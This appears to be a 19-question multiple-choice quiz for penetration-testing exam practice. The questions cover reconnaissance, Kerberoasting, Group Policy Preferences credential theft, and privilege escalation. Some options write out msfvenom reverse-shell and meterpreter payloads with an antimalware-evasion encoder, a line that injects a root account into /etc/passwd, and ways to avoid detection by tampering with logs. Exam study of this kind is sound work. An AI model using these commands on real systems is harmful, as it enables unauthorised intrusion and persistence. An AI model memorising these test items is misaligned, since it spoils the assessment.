
Pentest 5

Title of test:
Pentest 5

Description:
Pentester 5

Creation Date: 2026/04/16

Category: Others

Number of questions: 19

Content:

During a penetration test for a client that has a diverse infrastructure, the tester scans the network using Nmap and observes the following output: Which of the following would most likely be the target device?
- Switch
- SCADA
- IoT
- Router

A tester compromises a shared host that is manually audited every week due to the absence of a SIEM. Which of the following is the best way to reduce the chances of being detected?
- Modify files located in the /var/log directory
- Use the clear command to remove recent terminal activity
- Perform commands under one of the developer accounts
- Disable all logging services on the host

A penetration tester wants to verify whether passwords from a leaked password list can be used to access an SSH server as a legitimate user. Which of the following is the most appropriate tool for this task?
- BloodHound
- Responder
- Burp Suite
- Hydra

A penetration tester discovers a deprecated directory in which files are accessible to anyone. Which of the following would most likely assist the penetration tester in finding sensitive information without raising suspicion?
- Enumerating cached pages available on web pages
- Looking for externally available services
- Scanning for exposed ports associated with the domain
- Searching for vulnerabilities and potential exploits

A penetration tester gains initial access to a Windows workstation on a client’s network. The tester wants to determine the next target but does not want to install software on the workstation. Which of the following is the best tool to list potential targets?
- mmc.exe
- Netstat
- Mimikatz
- explorer.exe
- CME

A penetration tester completes an authenticated vulnerability scan of a host and receives the following results: Which of the following is most likely to cause stability when a session is created on a target machine?
- Running Responder with default settings and using Impacket
- Running Nmap with safe scripts enabled and targeting RDP
- Running Metasploit utilizing the EternalBlue module
- Running Hydra on the local user at one attempt per second

A penetration tester uses the Intruder tool from the Burp Suite Community Edition while assessing a web application. The tester notices the test is taking too long to complete. Which of the following tools can the tester use to accelerate the test and achieve similar results?
- TruffleHog
- Postman
- Wfuzz
- WPScan

A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by antimalware that is running on the target. Which of the following commands should the tester use to obtain shell access?
- msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/bind_tcp LPORT=443
- msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.100 LPORT=8000
- msfvenom --arch x86-64 --platform windows --payload windows/shell_reverse_tcp LHOST-10.10.10.100 LPORT-4444 EXITFUNC=none
- net user add /administrator | hexdump > payload

A Chief Information Security Officer wants to automate adversarial activities from penetration tests that are relevant to the organization. Which of the following should a penetration tester do first to accomplish this task?
- Deploy a command-and-control server with custom profiles to facilitate execution
- Use Python 3 with added testing libraries and script the relevant action to test
- Utilize the PowerShell PowerView tool with custom scripting additions based on test results
- Implement Atomic Red Team to chain critical TTPs and perform the test

A penetration tester identifies an exposed corporate directory containing first and last names and phone numbers for employees. Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?
- Smishing
- Impersonation
- Tailgating
- Whaling

During an assessment, a penetration tester obtains access to a Microsoft SQL server using sqlmap and runs the following command:
SQL> xp_cmdshell whoami /all
Which of the following is the tester trying to do?
- List database tables
- Show logged-in database users
- Enumerate privileges
- Display available SQL commands

During a security assessment of a network device, a penetration tester performs the following: Which of the following actions should the tester take to correct the vulnerability scan attempt?
- Enable promiscuous mode
- Modify -Tuning to 1
- Verify the ports used
- Remove the -evasion flag

During an assessment, a penetration tester runs the following command from a Linux machine:
GetUsersSPNs.py -dc-ip 172.16.1.1 DOMAIN.LOCAL/aholliday -request
Which of the following is the penetration tester trying to do?
- Crack the user password for aholliday
- Download all TGS tickets for offline processing
- Perform a pass-the-hash attack using the hash for aholliday
- Perform password spraying

A penetration tester gains low-privilege shell access to a host and discovers a world-writable script that is run regularly as root. The tester runs the following command:
openssl passwd password $l$OjxLvZ85$Fdr51vn/Z4zXWsQR/Xrj .
The tester then adds the following line to the world-writable script:
echo 'root2:$l$OjxLvZ85$Fdr51vn/Z4zXWsQR/Xrj1001:1001:,,,: /root:/bin/bash" >> /etc/passwd
Which of the following should the penetration tester do to enable this exploit to work correctly?
- Use only a single redirect to /etc/password
- Generate the password using md5sum
- Log in to the host using SSH
- Change the 1001 entries to 0

A penetration tester successfully phishes a user and compromises a domain-joined endpoint. The tester enumerates the domain controller and discovers that Group Policy Preferences are in use. The tester also finds that the version of the domain controllers is Windows Server 2012. The tester wants to use the fastest possible method of pivoting successfully to multiple production servers joined to the domain. Which of the following is the best way to achieve this goal?
- Scan the domain controller and locate an RCE using a Metasploit module with a reverse shell
- Run Hydra to password spray any dumped credentials from the initial host across subnets
- Use BloodHound to look for escalation paths against the AD environment
- Find the SYSVOL share for hashes with findstr /i and decrypt using the published key

A penetration tester gains access to the target network and observes a running SSH server. Which of the following techniques should the penetration tester use to obtain the version of SSH running on the target server?
- Network sniffing
- IP scanning
- Banner grabbing
- DNS enumeration

A company that uses an insecure corporate wireless network is concerned about security. Which of the following is the most likely tool a penetration tester could use to obtain initial access?
- Responder
- Metasploit
- Netcat
- Nmap

A penetration tester needs to quickly transfer an exploit from a Linux system to a Windows 10 system within the network. Which of the following is the best way to accomplish this task?
- nc -lvp 8080
- nc -lnvp 443
- python3 -m http.server 80
- neat -lvp 8080

A penetration tester downloads a JAR file that is used in an organization’s production environment. The tester evaluates the contents of the JAR file to identify potentially vulnerable components that can be targeted for exploit. Which of the following describes the tester's activities?
- SAST
- SBOM
- ICS
- SCA
